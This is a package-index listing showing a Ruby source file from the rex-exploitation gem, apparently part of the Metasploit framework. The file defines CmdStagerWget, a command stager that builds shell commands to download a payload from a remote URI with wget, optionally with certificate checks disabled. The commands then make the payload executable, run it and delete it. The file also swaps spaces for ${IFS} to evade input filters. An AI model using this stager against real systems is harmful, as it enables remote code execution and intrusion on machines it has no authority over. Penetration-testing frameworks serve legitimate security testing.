Sha256: d34cbbda0425fff79de3a02cdbe03165b19a763a0373e4bfb24a582f4e7846e9

Contents?: true

Size: 1.02 KB

Versions: 5

Compression:

Stored size: 1.02 KB

Contents

# -*- coding: binary -*-

class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase

  def http?
    true
  end

  def generate(opts = {})
    if opts[:payload_uri].nil?
      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
    end

    opts[:temp] ||= '/tmp'
    opts[:file] ||= Rex::Text.rand_text_alpha(8)
    @payload_path = "#{opts[:temp]}/#{opts[:file]}"

    super
  end

  def generate_cmds_payload(opts)
    cmds = []
    ncc  = '--no-check-certificate'

    if opts[:ssl]
      cmds << "wget -O #{@payload_path} #{ncc} #{opts[:payload_uri]}"
    else
      cmds << "wget -O #{@payload_path} #{opts[:payload_uri]}"
    end

    cmds
  end

  def generate_cmds_decoder(opts)
    cmds = []

    cmds << "chmod +x #{@payload_path}"
    cmds << @payload_path
    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]

    cmds
  end

  def compress_commands(cmds, opts)
    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
    super
  end

  def cmd_concat_operator
    ';'
  end

end

Version data entries

5 entries across 5 versions & 1 rubygems

Version Path
rex-exploitation-0.1.12 lib/rex/exploitation/cmdstager/wget.rb
rex-exploitation-0.1.11 lib/rex/exploitation/cmdstager/wget.rb
rex-exploitation-0.1.10 lib/rex/exploitation/cmdstager/wget.rb
rex-exploitation-0.1.9 lib/rex/exploitation/cmdstager/wget.rb
rex-exploitation-0.1.8 lib/rex/exploitation/cmdstager/wget.rb